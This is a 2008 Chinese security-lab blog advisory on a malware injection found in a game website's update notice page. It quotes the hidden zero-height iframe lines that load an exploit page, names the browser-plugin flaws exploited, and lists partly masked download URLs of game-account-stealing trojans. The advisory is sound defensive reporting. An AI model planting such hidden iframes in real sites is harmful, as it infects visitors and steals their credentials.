http://blog.sina.com.cn/antiyfx[订阅]
字体大小: 正文
天龙八部游戏网站挂马事件(2008-08-07 11:17:05)
标签:安天实验室 病毒 挂马 漏洞 恶意代码 杂谈  分类:防线预警

    8月7日,安天实验室发现,天龙八部游戏网站 (http://update.tl.sohu.com/tlbb/readme.htm)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
  天龙八部更新公告页面(http://update.tl.sohu.com/tlbb/readme.htm)多次被黑客植入恶意代码,从8月初到现在已经被挂马3次。
  从http://www.t****.cn/a0208291/a20.htm至http://www.t****.cn/a0208291/a20.htm均为挂马页面。
  该网站问题代码:

<iframe src=" http://www.t****.cn/a0208291/a20.htm" width="100" height="0"></iframe>
http://www.t****.cn/a0208291/a20.htm问题框架代码:

<iframe width=100 height=0 src=new.html></iframe>
http://www.t****.cn/a0208291/new.html网马代码:

以上加密网马解密后可知利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Adobe Flash Player SWF文件漏洞
暴风影音II mps.dll ActiveX栈溢出漏洞


当用户访问http://up****.tl.sohu.com/tlbb/readme.htm时,系统会自动下载以下病毒文件:
http://cdn.e5****.com/upkk.exe           病毒名:(Trojan-Downloader.Win32.Agent.wps)
http://cdn.e5****.com/up01.exe           病毒名:(Trojan.Win32.Agent.xqr)
http://cdn.e5****.com/up01B.exe          病毒名:(Trojan-GameThief.Win32.OnLineGames.snpn)
http://cdn.e5****.com/up02.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvk)
http://cdn.e5****.com/up02B.exe          病毒名:(Trojan-GameThief.Win32.OnLineGames.snry)
http://cdn.e5****.com/up03B.exe          病毒名:(Trojan-GameThief.Win32.OnLineGames.snyb)
http://cdn.e5****.com/up05.exe           病毒名:(Trojan-Downloader.Win32.Zlob.sab)
http://cdn.e5****.com/up06.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up07.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvj)
http://cdn.e5****.com/up08.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up10.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.shig)
http://cdn.e5****.com/up11.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.soir)
http://cdn.e5****.com/up12.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/up13.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snpv)
http://cdn.e5****.com/up14.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.slae)
http://cdn.e5****.com/up15.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.slae)
http://cdn.e5****.com/up16.exe           病毒名:(Trojan-PSW.Win32.Agent.nr)
http://cdn.e5****.com/up17.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.soit)
http://cdn.e5****.com/up18.exe           病毒名:(Trojan.Win32.Agent.sav)
http://cdn.e5****.com/up19.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up20.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snpw)
http://cdn.e5****.com/up21.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/up22.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.soit)
http://cdn.e5****.com/up23.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.shhw)
http://cdn.e5****.com/up24.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.shhw)
http://cdn.e5****.com/up25.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up26.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up27.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snnq)
http://cdn.e5****.com/up28.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up29.exe           病毒名:(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/tzt.exe            病毒名:(Trojan-Downloader.Win32.Agent.wps)

    

以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。

 

出处:安天实验室

已投稿到: 排行榜 圈子
阅读|评论|收藏|打印|举报
前一篇:Trojan-Downloader.Win32.Agent.yko分析
后一篇:安天实验室2008年8月7日病毒预警
评论    重要提示:警惕虚假中奖信息,点击查看详情[发评论]
  • 评论加载中,请稍候...
发评论    明星私家相册

验证码:看不清楚数字吗?点击这里再试试。收听验证码

发评论

以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

相关博文
读取中...
推荐博文
读取中...